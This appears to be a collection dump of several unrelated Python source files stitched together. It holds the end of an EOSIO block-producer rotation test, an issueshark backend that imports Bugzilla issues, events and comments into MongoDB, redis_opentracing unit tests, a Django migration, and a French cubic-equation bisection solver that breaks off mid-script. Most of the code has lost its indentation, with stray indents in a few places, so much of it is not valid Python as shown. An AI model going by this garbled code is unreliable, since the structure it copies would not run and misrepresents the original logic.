if lastBlockProducer is not None and lastBlockProducer==node.getBlockProducerByNum(blockNum):
Utils.cmdError("expected blockNum %s to be produced by any of the valid producers except %s" % (blockNum, lastBlockProducer))
Utils.errorExit("Failed because of incorrect block producer order")
# make sure that the next set of 12 blocks all have the same blockProducer
lastBlockProducer=node.getBlockProducerByNum(blockNum)
for k in range(0, 12):
                validBlockProducer(prodsActive, prodsSeen, blockNum, node)
blockProducer=node.getBlockProducerByNum(blockNum)
if lastBlockProducer!=blockProducer:
printStr=""
newBlockNum=blockNum-18
for l in range(0,36):
printStr+="%s" % (newBlockNum)
printStr+=":"
newBlockProducer=node.getBlockProducerByNum(newBlockNum)
printStr+="%s" % (newBlockProducer)
printStr+=" "
newBlockNum+=1
                    Utils.cmdError("expected blockNum %s (started from %s) to be produced by %s, but produced by %s: round=%s, prod slot=%s, prod num=%s - %s" % (blockNum, startingFrom, lastBlockProducer, blockProducer, i, j, k, printStr))
Utils.errorExit("Failed because of incorrect block producer order")
blockNum+=1
# make sure that we have seen all 21 producers
prodsSeenKeys=prodsSeen.keys()
if len(prodsSeenKeys)!=21:
Utils.cmdError("only saw %s producers of expected 21. At blockNum %s only the following producers were seen: %s" % (len(prodsSeenKeys), blockNum, ",".join(prodsSeenKeys)))
Utils.errorExit("Failed because of missing block producers")
Utils.Debug=temp
Print=Utils.Print
errorExit=Utils.errorExit
from core_symbol import CORE_SYMBOL
args = TestHelper.parse_args({"--prod-count","--dump-error-details","--keep-logs","-v","--leave-running","--clean-run",
"--p2p-plugin","--wallet-port"})
Utils.Debug=args.v
totalNodes=4
cluster=Cluster(walletd=True)
dumpErrorDetails=args.dump_error_details
keepLogs=args.keep_logs
dontKill=args.leave_running
prodCount=args.prod_count
killAll=args.clean_run
p2pPlugin=args.p2p_plugin
walletPort=args.wallet_port
walletMgr=WalletMgr(True, port=walletPort)
testSuccessful=False
killEosInstances=not dontKill
killWallet=not dontKill
WalletdName=Utils.EosWalletName
ClientName="cleos"
try:
TestHelper.printSystemInfo("BEGIN")
cluster.setWalletMgr(walletMgr)
cluster.killall(allInstances=killAll)
cluster.cleanup()
time.sleep(5)
Print("Stand up cluster")
if cluster.launch(prodCount=prodCount, onlyBios=False, pnodes=totalNodes, totalNodes=totalNodes, totalProducers=totalNodes*21, p2pPlugin=p2pPlugin, useBiosBootFile=False) is False:
Utils.cmdError("launcher")
Utils.errorExit("Failed to stand up eos cluster.")
Print("Validating system accounts after bootstrap")
cluster.validateAccounts(None)
accounts=cluster.createAccountKeys(5)
if accounts is None:
Utils.errorExit("FAILURE - create keys")
accounts[0].name="tester111111"
accounts[1].name="tester222222"
accounts[2].name="tester333333"
accounts[3].name="tester444444"
accounts[4].name="tester555555"
testWalletName="test"
Print("Creating wallet \"%s\"." % (testWalletName))
testWallet=walletMgr.create(testWalletName, [cluster.eosioAccount,accounts[0],accounts[1],accounts[2],accounts[3],accounts[4]])
for _, account in cluster.defProducerAccounts.items():
walletMgr.importKey(account, testWallet, ignoreDupKeyWarning=True)
Print("Wallet \"%s\" password=%s." % (testWalletName, testWallet.password.encode("utf-8")))
for i in range(0, totalNodes):
node=cluster.getNode(i)
node.producers=Cluster.parseProducers(i)
for prod in node.producers:
            trans=node.regproducer(cluster.defProducerAccounts[prod], "http://mysite.com", 0, waitForTransBlock=False, exitOnError=True)
node0=cluster.getNode(0)
node1=cluster.getNode(1)
node2=cluster.getNode(2)
node3=cluster.getNode(3)
node=node0
# create accounts via eosio as otherwise a bid is needed
for account in accounts:
Print("Create new account %s via %s" % (account.name, cluster.eosioAccount.name))
trans=node.createInitializeAccount(account, cluster.eosioAccount, stakedDeposit=0, waitForTransBlock=False, stakeNet=1000, stakeCPU=1000, buyRAM=1000, exitOnError=True)
transferAmount="100000000.0000 {0}".format(CORE_SYMBOL)
Print("Transfer funds %s from account %s to %s" % (transferAmount, cluster.eosioAccount.name, account.name))
node.transferFunds(cluster.eosioAccount, account, transferAmount, "test transfer")
trans=node.delegatebw(account, 20000000.0000, 20000000.0000, waitForTransBlock=True, exitOnError=True)
# containers for tracking producers
prodsActive={}
for i in range(0, 4):
node=cluster.getNode(i)
ProducerToNode.populate(node, i)
for prod in node.producers:
prodsActive[prod]=False
#first account will vote for node0 producers, all others will vote for node1 producers
node=node0
for account in accounts:
trans=node.vote(account, node.producers, waitForTransBlock=True)
node=node1
setActiveProducers(prodsActive, node1.producers)
verifyProductionRounds(trans, node2, prodsActive, 2)
# test shifting all 21 away from one node to another
    # first account will vote for node1 producers, all others will vote for node2 producers
    node=node1
for account in accounts:
trans=node.vote(account, node.producers, waitForTransBlock=True)
node=node2
setActiveProducers(prodsActive, node2.producers)
verifyProductionRounds(trans, node1, prodsActive, 2)
testSuccessful=True
finally:
TestHelper.shutdown(cluster, walletMgr, testSuccessful, killEosInstances, killWallet, keepLogs, killAll, dumpErrorDetails)
exit(0)
|
py | 1a32f76ece3c6fc9a90629e8e53469b4d7c989a7 | import sys
import dateutil.parser
from mongoengine import DoesNotExist
import copy
from issueshark.backends.basebackend import BaseBackend
from issueshark.backends.helpers.bugzillaagent import BugzillaAgent
from validate_email import validate_email
import logging
from pycoshark.mongomodels import Issue, People, Event, IssueComment
logger = logging.getLogger('backend')
class BugzillaBackend(BaseBackend):
"""
Backend that collects data from a Bugzilla REST API
"""
@property
def identifier(self):
"""
Identifier (bugzilla)
"""
return 'bugzillaOld'
def __init__(self, cfg, issue_system_id, project_id):
"""
Initialization
Initializes the people dictionary see: :func:`~issueshark.backends.bugzilla.BugzillaBackend._get_people`
Initializes the attribute mapping: Maps attributes from the bugzilla API to our database design
:param cfg: holds als configuration. Object of class :class:`~issueshark.config.Config`
:param issue_system_id: id of the issue system for which data should be collected. :class:`bson.objectid.ObjectId`
:param project_id: id of the project to which the issue system belongs. :class:`bson.objectid.ObjectId`
"""
super().__init__(cfg, issue_system_id, project_id)
logger.setLevel(self.debug_level)
self.bugzilla_agent = None
self.people = {}
self.at_mapping = {
'assigned_to_detail': 'assignee_id',
'blocks': 'issue_links',
'component': 'components',
'creation_time': 'created_at',
'creator_detail': 'creator_id',
'depends_on': 'issue_links',
'dupe_of': 'issue_links',
'keywords': 'labels',
'last_change_time': 'updated_at',
'op_sys': 'environment',
'platform': 'platform',
'resolution': 'resolution',
'severity': 'priority',
'status': 'status',
'summary': 'title',
'target_milestone': 'fix_versions',
'version': 'affects_versions'
}
def process(self):
"""
Gets all the issues and their updates
1. Gets the last stored issues updated_at field
2. Gets all issues that was last change since this value
3. Processes the results in 50-steps
4. For each issue calls: :func:`issueshark.backends.bugzilla.BugzillaBackend._process_issue`
"""
self.bugzilla_agent = BugzillaAgent(logger, self.config)
# Get last modification date (since then, we will collect bugs)
last_issue = Issue.objects(issue_system_id=self.issue_system_id).order_by('-updated_at')\
.only('updated_at').first()
starting_date = None
if last_issue is not None:
starting_date = last_issue.updated_at
# Get all issues
issues = self.bugzilla_agent.get_bug_list(last_change_time=starting_date, limit=50)
# If no new bugs found, return
if len(issues) == 0:
logger.info('No new issues found. Exiting...')
sys.exit(0)
# Otherwise, go through all issues
processed_results = 50
while len(issues) > 0:
logger.info("Processing %d issues..." % len(issues))
for issue in issues:
logger.info("Processing issue %s" % issue['id'])
self._process_issue(issue)
# Go through the next issues
issues = self.bugzilla_agent.get_bug_list(last_change_time=starting_date, limit=50, offset=processed_results)
processed_results += 50
def _process_issue(self, issue):
"""
Processes the issue in several steps:
1. Get all comments. See: :func:`issueshark.backends.helpers.bugzillaagent.BugzillaAgent.get_comments`
2. Get the whole issue history.\
See: :func:`issueshark.backends.helpers.bugzillaagent.BugzillaAgent.get_issue_history`
3. Transforms the issue to our issue model. \
See: :func:`issueshark.backends.bugzilla.BugzillaBackend._transform_issue`
        4. Go through the history of the issue (newest to oldest) and set back the issue step by step. During this \
processing: Store the events. See: :func:`issueshark.backends.bugzilla.BugzillaBackend._process_event`
5. Process all comments. See: :func:`issueshark.backends.bugzilla.BugzillaBackend._process_comments`
:param issue: issue that was got from the bugzilla REST API
"""
# Transform issue
comments = self.bugzilla_agent.get_comments(issue['id'])
histories = self.bugzilla_agent.get_issue_history(issue['id'])
mongo_issue = self._transform_issue(issue, comments)
logger.debug('Transformed issue: %s', mongo_issue)
# Go through history
# 1) Set back issue
# 2) Store events
j = 0
events_to_insert = []
for history in reversed(histories):
i = 0
change_date = dateutil.parser.parse(history['when'])
author_id = self._get_people(history['who'])
for bz_event in history['changes']:
logger.debug("Processing event: %s" % bz_event)
unique_event_id = str(issue['id'])+"%%"+str(i)+"%%"+str(j)
mongo_event, is_new_event = self._process_event(unique_event_id, bz_event, mongo_issue, change_date,
author_id)
logger.debug('Newly created?: %s, Resulting event: %s' % (is_new_event, mongo_event))
# Append to list if event is not stored in db
if is_new_event:
events_to_insert.append(mongo_event)
i += 1
j += 1
# Update issue to the original version
mongo_issue.save()
# Store events
if events_to_insert:
Event.objects.insert(events_to_insert, load_bulk=False)
# Store comments
self._process_comments(mongo_issue.id, comments)
def _process_comments(self, mongo_issue_id, comments):
"""
Processes the comments for an issue
:param mongo_issue_id: Object of class :class:`bson.objectid.ObjectId`. Identifier of the document that holds
the issue information
:param comments: comments that were received from the bugzilla API
"""
# Go through all comments of the issue
comments_to_insert = []
logger.info('Processing %d comments...' % (len(comments)-1))
i = -1
for comment in comments:
# Comment with count 0 is the description of the bug
if comment['count'] == 0:
continue
i += 1
logger.debug('Processing comment: %s' % comment)
unique_comment_id = "%s%%%s" % (mongo_issue_id, i)
try:
IssueComment.objects(external_id=unique_comment_id, issue_id=mongo_issue_id).get()
continue
except DoesNotExist:
mongo_comment = IssueComment(
external_id=unique_comment_id,
issue_id=mongo_issue_id,
created_at=dateutil.parser.parse(comment['creation_time']),
author_id=self._get_people(comment['creator']),
comment=comment['text'],
)
logger.debug('Resulting comment: %s' % mongo_comment)
comments_to_insert.append(mongo_comment)
# If comments need to be inserted -> bulk insert
if comments_to_insert:
IssueComment.objects.insert(comments_to_insert, load_bulk=False)
def _process_event(self, unique_event_id, bz_event, mongo_issue, change_date, author_id):
"""
Processes the event. During the event processing the Issue is set back to its original state
        before the event occurred.
:param unique_event_id: unique identifier of the event
:param bz_event: event that was received from the bugzilla API
:param mongo_issue: issue that is/should be stored in the mongodb
:param change_date: date when the event was created
:param author_id: :class:`bson.objectid.ObjectId` of the author of the event
"""
is_new_event = True
try:
mongo_event = Event.objects(external_id=unique_event_id, issue_id=mongo_issue.id).get()
is_new_event = False
except DoesNotExist:
mongo_event = Event(
external_id=unique_event_id,
issue_id=mongo_issue.id,
created_at=change_date,
author_id=author_id
)
# We need to map back the status from the bz terminology to ours. Special: The assigned_to must be mapped to
# assigned_to_detail beforehand, as we are using this for the issue parsing
if bz_event['field_name'] == 'assigned_to':
bz_at_name = 'assigned_to_detail'
else:
bz_at_name = bz_event['field_name']
try:
mongo_event.status = self.at_mapping[bz_at_name]
except KeyError:
logger.warning('Mapping for attribute %s not found.' % bz_at_name)
mongo_event.status = bz_at_name
# Check if the mongo_issue has the attribute.
# If yes: We can use the mongo_issue to set the old and new value of the event
# If no: We use the added / removed fields
if hasattr(mongo_issue, mongo_event.status):
mongo_event.new_value = copy.deepcopy(getattr(mongo_issue, mongo_event.status))
self._set_back_mongo_issue(mongo_issue, mongo_event.status, bz_event)
mongo_event.old_value = copy.deepcopy(getattr(mongo_issue, mongo_event.status))
else:
mongo_event.new_value = bz_event['added']
mongo_event.old_value = bz_event['removed']
return mongo_event, is_new_event
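    # Illustrative example (hypothetical values): a history entry such as
    #   {'field_name': 'status', 'removed': 'NEW', 'added': 'RESOLVED'}
    # maps to an Event with status='status' (via at_mapping); new_value is copied from the
    # current mongo_issue state and old_value from the state after the issue has been set back,
    # which for a plain string field is the 'removed' value ('NEW' here).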
def _set_back_mongo_issue(self, mongo_issue, mongo_at_name, bz_event):
"""
Method to set back the issue stored in the mongodb
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
function_mapping = {
'title': self._set_back_string_field,
'priority': self._set_back_priority,
'status': self._set_back_string_field,
'affects_versions': self._set_back_array_field,
'components': self._set_back_array_field,
'labels': self._set_back_array_field,
'resolution': self._set_back_string_field,
'fix_versions': self._set_back_array_field,
'assignee_id': self._set_back_assignee,
'issue_links': self._set_back_issue_links,
'environment': self._set_back_string_field,
'platform': self._set_back_string_field
}
correct_function = function_mapping[mongo_at_name]
correct_function(mongo_issue, mongo_at_name, bz_event)
def _set_back_priority(self, mongo_issue, mongo_at_name, bz_event):
"""
Sets back the priority of the issue before the event
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
if bz_event['removed'] == 'enhancement':
mongo_issue.issue_type = 'Enhancement'
else:
mongo_issue.issue_type = 'Bug'
mongo_issue.priority = bz_event['removed']
def _set_back_issue_links(self, mongo_issue, mongo_at_name, bz_event):
"""
Sets back the link to the issue before the event
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
type_mapping = {
'blocks': 'Blocker',
'dupe_of': 'Duplicate',
'depends_on': 'Dependent',
}
item_list = getattr(mongo_issue, mongo_at_name)
# Everything that is in "removed" must be added
if bz_event['removed']:
issue_id = self._get_issue_id_by_system_id(bz_event['removed'])
if issue_id not in [entry['issue_id'] for entry in item_list]:
item_list.append({'issue_id': issue_id, 'type': type_mapping[bz_event['field_name']],
'effect': bz_event['field_name']})
# Everything that is in "added" must be removed
if bz_event['added']:
issue_id = self._get_issue_id_by_system_id(bz_event['added'])
found_index = 0
for stored_issue in item_list:
if stored_issue['issue_id'] == issue_id:
break
found_index += 1
try:
del item_list[found_index]
except IndexError:
logger.warning('Could not process event %s completely. Did not found issue to delete Issue %s' %
(bz_event, mongo_issue))
setattr(mongo_issue, mongo_at_name, item_list)
def _set_back_assignee(self, mongo_issue, mongo_at_name, bz_event):
"""
Sets back the assignee of the issue before the event
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
if bz_event['removed']:
setattr(mongo_issue, mongo_at_name, self._get_people(bz_event['removed']))
else:
setattr(mongo_issue, mongo_at_name, None)
def _set_back_string_field(self, mongo_issue, mongo_at_name, bz_event):
"""
Sets back normal string fields, e.g., title, of the issue before the event
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
setattr(mongo_issue, mongo_at_name, bz_event['removed'])
def _set_back_array_field(self, mongo_issue, mongo_at_name, bz_event):
"""
Sets back array fields, e.g., components, of the issue before the event
:param mongo_issue: issue stored in the mongodb
:param mongo_at_name: attribute name of the field of the issue document
:param bz_event: event from the bugzilla api
"""
item_list = getattr(mongo_issue, mongo_at_name)
# Everything that is in "added" must be removed
if bz_event['added']:
# We try to remove the item. If it is not in there, we remove the whole list. Observations showed,
# that this is most likely the correct decision
try:
item_list.remove(bz_event['added'])
except ValueError:
item_list.clear()
# Everything that is in "removed" must be added
if bz_event['removed'] and bz_event['removed'] not in item_list:
item_list.append(bz_event['removed'])
setattr(mongo_issue, mongo_at_name, item_list)
def _parse_bz_field(self, bz_issue, at_name_bz):
"""
Parses fields from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
field_mapping = {
'assigned_to_detail': self._parse_author_details,
'blocks': self._parse_issue_links,
'component': self._parse_string_field,
'creation_time': self._parse_date_field,
'creator_detail': self._parse_author_details,
'depends_on': self._parse_issue_links,
'dupe_of': self._parse_issue_links,
'keywords': self._parse_array_field,
'last_change_time': self._parse_date_field,
'op_sys': self._parse_string_field,
'platform': self._parse_string_field,
'resolution': self._parse_string_field,
'severity': self._parse_string_field,
'status': self._parse_string_field,
'summary': self._parse_string_field,
'target_milestone': self._parse_string_field,
'version': self._parse_string_field,
}
correct_function = field_mapping.get(at_name_bz)
return correct_function(bz_issue, at_name_bz)
def _parse_author_details(self, bz_issue, at_name_bz):
"""
Parses author details from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
if 'email' in bz_issue[at_name_bz]:
return self._get_people(bz_issue[at_name_bz]['name'], bz_issue[at_name_bz]['email'],
bz_issue[at_name_bz]['real_name'])
else:
return self._get_people(bz_issue[at_name_bz]['name'])
def _parse_string_field(self, bz_issue, at_name_bz):
"""
Parses string fields from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
return bz_issue[at_name_bz]
def _parse_array_field(self, bz_issue, at_name_bz):
"""
Parses array fields from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
return bz_issue[at_name_bz]
def _parse_issue_links(self, bz_issue, at_name_bz):
"""
Parses the issue links from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
type_mapping = {
'blocks': 'Blocker',
'dupe_of': 'Duplicate',
'depends_on': 'Dependent',
}
issue_links = []
if isinstance(bz_issue[at_name_bz], list):
for link in bz_issue[at_name_bz]:
issue_links.append({
'issue_id': self._get_issue_id_by_system_id(link),
'type': type_mapping[at_name_bz],
'effect': at_name_bz
})
else:
if bz_issue[at_name_bz] is not None:
issue_links.append({
'issue_id': self._get_issue_id_by_system_id(bz_issue[at_name_bz]),
'type': type_mapping[at_name_bz],
'effect': at_name_bz
})
return issue_links
def _parse_date_field(self, bz_issue, at_name_bz):
"""
Parses the date field from the bugzilla issue
:param bz_issue: bugzilla issue (returned by the API)
:param at_name_bz: attribute name that should be parsed
"""
return dateutil.parser.parse(bz_issue[at_name_bz])
def _transform_issue(self, bz_issue, bz_comments):
"""
Transforms the issue from an bugzilla issue to our issue model
:param bz_issue: bugzilla issue (returned by the API)
:param bz_comments: comments to the bugzilla issue (as the first comment is the description of the issue)
:return:
"""
try:
mongo_issue = Issue.objects(issue_system_id=self.issue_system_id, external_id=str(bz_issue['id'])).get()
except DoesNotExist:
mongo_issue = Issue(
issue_system_id=self.issue_system_id,
external_id=str(bz_issue['id'])
)
# Set fields that can be directly mapped
for at_name_bz, at_name_mongo in self.at_mapping.items():
if isinstance(getattr(mongo_issue, at_name_mongo), list):
# Get the result and the current value and merge it together
result = self._parse_bz_field(bz_issue, at_name_bz)
current_value = getattr(mongo_issue, at_name_mongo, list())
if not isinstance(result, list):
result = [result]
# Extend
current_value.extend(result)
if len(current_value) > 0 and at_name_mongo == 'issue_links':
current_value = list({v['issue_id']: v for v in current_value}.values())
else:
current_value = list(set(current_value))
# Set the attribute
setattr(mongo_issue, at_name_mongo, copy.deepcopy(current_value))
else:
setattr(mongo_issue, at_name_mongo, self._parse_bz_field(bz_issue, at_name_bz))
# The first comment is the description! Bugzilla does not have a separate description field. The comment
# with the count == 0 is the description
for comment in bz_comments:
if comment['count'] == 0:
mongo_issue.desc = comment['text']
break
# Bugzilla does not have a separate field for the type. Therefore, we distinguish between bug an enhancement
# based on the severity information
if bz_issue['severity'] == 'enhancement':
mongo_issue.issue_type = 'Enhancement'
else:
mongo_issue.issue_type = 'Bug'
return mongo_issue.save()
def _get_mongo_attribute(self, field_name):
"""
        Maps the attributes of the bugzilla api to the attributes of the document stored in the mongodb
:param field_name: field name that should be mapped
"""
return self.at_mapping[field_name]
def _get_people(self, username, email=None, name=None):
"""
Gets people from the people collection
:param username: username of the user
:param email: email of the user
:param name: name of the user
"""
# Check if user was accessed before. This reduces the amount of API requests
if username in self.people:
return self.people[username]
# If email and name are not set, make a request to get the user
if email is None and name is None:
user = self.bugzilla_agent.get_user(username)
            # If the user is not found, we must use the username as the name
if user is None:
email = None
name = username
else:
email = user['email']
name = user['real_name']
# Check if email is none, this can happen as an email address may be excluded from the return value
if email is None:
# Check if the username is a valid email address, if yes use this
if validate_email(username):
email = username
else:
email = "[email protected]"
# Replace the email address "anonymization"
email = email.replace(' at ', '@').replace(' dot ', '.')
people_id = People.objects(name=name, email=email).upsert_one(name=name, email=email, username=username).id
self.people[username] = people_id
return people_id
def _get_issue_id_by_system_id(self, system_id):
"""
Gets the issue by their id that was assigned by the bugzilla ITS
:param system_id: id of the issue in the bugzilla ITS
"""
try:
issue_id = Issue.objects(issue_system_id=self.issue_system_id, external_id=str(system_id)).only('id').get().id
except DoesNotExist:
issue_id = Issue(issue_system_id=self.issue_system_id, external_id=str(system_id)).save().id
return issue_id
|
py | 1a32f79af400eaf7bf387c4b135a431db3cd5772 | from opentracing.mocktracer import MockTracer
from mock import patch
import unittest
import redis
import redis_opentracing
class TestClient(unittest.TestCase):
def setUp(self):
self.tracer = MockTracer()
self.client = redis.StrictRedis()
def test_trace_client(self):
with patch.object(self.client,
'execute_command',
return_value='1') as exc_command:
exc_command.__name__ = 'execute_command'
redis_opentracing.init_tracing(self.tracer,
trace_all_classes=False)
redis_opentracing.trace_client(self.client)
res = self.client.get('my.key')
self.assertEqual(res, '1')
self.assertEqual(exc_command.call_count, 1)
self.assertTrue(True, exc_command.call_args == (('my.key',),))
self.assertEqual(len(self.tracer.finished_spans()), 1)
span = self.tracer.finished_spans()[0]
self.assertEqual(span.operation_name, 'GET')
self.assertEqual(span.tags, {
'component': 'redis-py',
'db.type': 'redis',
'db.statement': 'GET my.key',
'span.kind': 'client',
})
def test_trace_client_error(self):
with patch.object(self.client,
'execute_command',
side_effect=ValueError) as exc_command:
exc_command.__name__ = 'execute_command'
redis_opentracing.init_tracing(self.tracer,
trace_all_classes=False)
redis_opentracing.trace_client(self.client)
call_exc = None
try:
self.client.get('my.key')
except ValueError as exc:
call_exc = exc
self.assertEqual(exc_command.call_count, 1)
self.assertTrue(True, exc_command.call_args == (('my.key',),))
self.assertEqual(len(self.tracer.finished_spans()), 1)
span = self.tracer.finished_spans()[0]
self.assertEqual(span.operation_name, 'GET')
self.assertEqual(span.tags, {
'component': 'redis-py',
'db.type': 'redis',
'db.statement': 'GET my.key',
'span.kind': 'client',
'error': True,
})
self.assertEqual(len(span.logs), 1)
self.assertEqual(span.logs[0].key_values.get('event', None),
'error')
self.assertTrue(isinstance(
span.logs[0].key_values.get('error.object', None), ValueError
))
def test_trace_client_start_span_cb(self):
def start_span_cb(span):
span.set_operation_name('Test')
with patch.object(self.client,
'execute_command',
return_value='1') as exc_command:
exc_command.__name__ = 'execute_command'
redis_opentracing.init_tracing(self.tracer,
trace_all_classes=False,
start_span_cb=start_span_cb)
redis_opentracing.trace_client(self.client)
res = self.client.get('my.key')
span = self.tracer.finished_spans()[0]
self.assertEqual(span.operation_name, 'Test')
def test_trace_client_start_span_cb_exc(self):
def start_span_cb(span):
raise RuntimeError('This should not happen')
with patch.object(self.client,
'execute_command',
return_value='1') as exc_command:
exc_command.__name__ = 'execute_command'
redis_opentracing.init_tracing(self.tracer,
trace_all_classes=False,
start_span_cb=start_span_cb)
redis_opentracing.trace_client(self.client)
res = self.client.get('my.key')
span = self.tracer.finished_spans()[0]
self.assertEqual(span.operation_name, 'GET')
self.assertFalse(span.tags.get('error', False))
def test_trace_client_pipeline(self):
redis_opentracing.init_tracing(self.tracer,
trace_all_classes=False)
redis_opentracing.trace_client(self.client)
pipe = self.client.pipeline()
pipe.rpush('my:keys', 1, 3)
pipe.rpush('my:keys', 5, 7)
pipe.execute()
self.assertEqual(len(self.tracer.finished_spans()), 1)
span = self.tracer.finished_spans()[0]
self.assertEqual(span.operation_name, 'MULTI')
self.assertEqual(span.tags, {
'component': 'redis-py',
'db.type': 'redis',
'db.statement': 'RPUSH my:keys 1 3;RPUSH my:keys 5 7',
'span.kind': 'client',
})
def test_trace_client_pubsub(self):
redis_opentracing.init_tracing(self.tracer,
trace_all_classes=False)
redis_opentracing.trace_client(self.client)
pubsub = self.client.pubsub()
pubsub.subscribe('test')
# Subscribing can cause more than a SUBSCRIBE call.
self.assertTrue(len(self.tracer.finished_spans()) >= 1)
span = self.tracer.finished_spans()[0]
self.assertEqual(span.operation_name, 'SUBSCRIBE')
self.assertEqual(span.tags, {
'component': 'redis-py',
'db.type': 'redis',
'db.statement': 'SUBSCRIBE test',
'span.kind': 'client',
})
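# Outside of unittest, the pattern exercised above boils down to (sketch, not a full example):
#     redis_opentracing.init_tracing(tracer, trace_all_classes=False)
#     redis_opentracing.trace_client(client)
# after which commands, pipelines and pubsub calls issued through `client` are reported as spans.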
|
py | 1a32f90518c76d363f7512aaf81fec08649edbb0 | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-09-20 21:19
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('gated_launch_auth', '0006_auto_20170726_1537'),
]
operations = [
migrations.AddField(
model_name='user',
name='weixin_openid',
field=models.CharField(blank=True, db_index=True, max_length=60, null=True),
),
]
|
py | 1a32fbc0df687a1cdf09f1b58a2613a4db34bad0 | # commentaire
# resolution approchée d'une equation du troisième degre
# version 2
import math
# Function that computes delta (the discriminant)
def calculerDelta(a, b, c):
return b**2-4*a*c
# Function that solves a second-degree (quadratic) equation
def resoudreEquationSecondDegre(a, b, c):
delta = calculerDelta(a, b, c)
if delta > 0:
racineDeDelta = math.sqrt(delta)
retour = [(-b-racineDeDelta)/(2*a), (-b+racineDeDelta)/(2*a)]
elif delta < 0:
        retour = [] # empty list
else:
        retour = [-b/(2*a)] # single-element list
return retour
# Function that computes the value of f(x) = ax^3 + bx^2 + cx + d
def calculerFxPolynome3dg(x, a, b, c, d):
return a*x**3 + b*x**2 + c*x + d
# Function that compares the signs of two numbers: true = same sign, false = opposite signs
def compareSign(x, y):
if(x > 0 and y > 0) or (x < 0 and y < 0):
return True
else:
return False
# Function that iterates 100 times between two values x1 and x2, with f(x1) and f(x2) of opposite signs, and returns the value x approaching f(x)=0
def trouverFxEgal0(p1, p2, a, b, c, d):
for i in range(0, 100):
        # To do this, take the point p0 midway between p1 and p2 and check whether f(p0) is positive or negative
p0 = (p1+p2)/2
        # compute f(p0), f(p1) and f(p2)
fp0 = calculerFxPolynome3dg(p0, a, b, c, d)
fp1 = calculerFxPolynome3dg(p1, a, b, c, d)
fp2 = calculerFxPolynome3dg(p2, a, b, c, d)
# print("itération ", i, " : fp0 = ", fp0," fp1 = ", fp1, " fp2 = ", fp2)
if compareSign(fp0, fp1):
p1 = p0
p2 = p2
else:
p1 = p1
p2 = p0
return p0
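# Quick sanity check of the bisection above (illustrative values): for f(x) = x^3 - x,
# i.e. a=1, b=0, c=-1, d=0, we have f(0.5) < 0 and f(2) > 0, so
#   trouverFxEgal0(0.5, 2, 1, 0, -1, 0)
# converges towards the root x = 1.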
# read the parameters of the function f with the input function
# input returns a string, so the float function converts it to
# a decimal type
print("Saisir les paramètres a,b,c,d de votre polynome du troisième degré a^3 + bx^2 + cx + d:")
a = float(input("Saisir la valeur de a="))
b = float(input("Saisir la valeur de b="))
c = float(input("Saisir la valeur de c="))
d = float(input("Saisir la valeur de d="))
# Compute the parameters of the derivative function f'
A = 3*a
B = 2*b
C = c
print("La dérivée f' de la fonction f est ", A, "x^2 + ", B, "x + ", C)
# Solve and display the second-degree equation f'
print("Résolution de l'équation f' ", A, "x^2 + ", B, "x + ", C)
delta = calculerDelta(A, B, C)
result = resoudreEquationSecondDegre(A, B, C)
# Branch on the delta of f', in this order: >0, then ==0, then <0
if delta > 0:
    # Order the results x1 and x2, solutions of the equation f'(x)=0
if result[0] > result[1]:
x1 = result[1]
x2 = result[0]
else:
x1 = result[0]
x2 = result[1]
print("Delta de f' est positif donc il y a 2 solutions")
print("x1 =", x1)
print("x2 =", x2)
    # Determine the variations of f according to the value of Delta and the sign of A
if A > 0:
print("Delta de f' est positif ainsi que A donc les variations de f(x) sont les suivantes :")
print("pour x < ", x1, " f(x) est croissante")
print("pour ", x1, " < x < ", x2, " f(x) est decroissante")
print("pour x > ", x2, " f(x) est croissante")
    else: # A is negative
print("Delta de f' est positif et A est négatif donc les variations de f(x) sont les suivantes :")
print("pour x < ", result[0], " f(x) est décroissante")
print("pour ", result[0], " < x < ", result[1], " f(x) est croissante")
print("pour x > ", result[1], " f(x) est décroissante")
    # Compute f(x1) and f(x2), extrema of f for Delta > 0 and A positive or negative
print("Calculons f(x1) et f(x2), extremum de f")
f1 = calculerFxPolynome3dg(x1, a, b, c, d)
f2 = calculerFxPolynome3dg(x2, a, b, c, d)
print("f1 =", f1)
print("f2 =", f2)
if (f1 < 0 and f2 > 0) or (f1 > 0 and f2 < 0):
print("Cas ou f1 et f2 sont de signes oposés. Il y a donc une solution f(x) = 0 pour x compris entre x1 et x2")
        # Approximate the solution f(x) = 0 for x between x1 and x2
# ---------------------------------------------------------------
        # Loop that evaluates f(x) for x between x1 and x2
p1 = x1
p2 = x2
p0 = trouverFxEgal0(p1, p2, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x compris entre x1 et x2 après n itérations : ", p0)
print("Valeur de f(p0): ", calculerFxPolynome3dg(p0, a, b, c, d))
        # Approximate the solution f(x) = 0 for x < x1
# ----------------------------------------------------
        # find a point x0 below x1 such that f(x0) has the opposite sign of f(x1)
x0 = x1 - 1
while compareSign(calculerFxPolynome3dg(x0, a, b, c, d), calculerFxPolynome3dg(x1, a, b, c, d)):
x0 = x0 - 1
print(
"Valeur de x0 de sorte que f(x0) et f(x1) soient de signe opposé avec x < x1 : ", x0)
print("Valeur de f(x0) ", calculerFxPolynome3dg(x0, a, b, c, d))
print("Valeur de f(x1) ", calculerFxPolynome3dg(x1, a, b, c, d))
p0 = trouverFxEgal0(x0, x1, a, b, c, d)
print(
"Valeur approchant p0 de x pour f(x) = 0 et x < x1 après n itérations : ", p0)
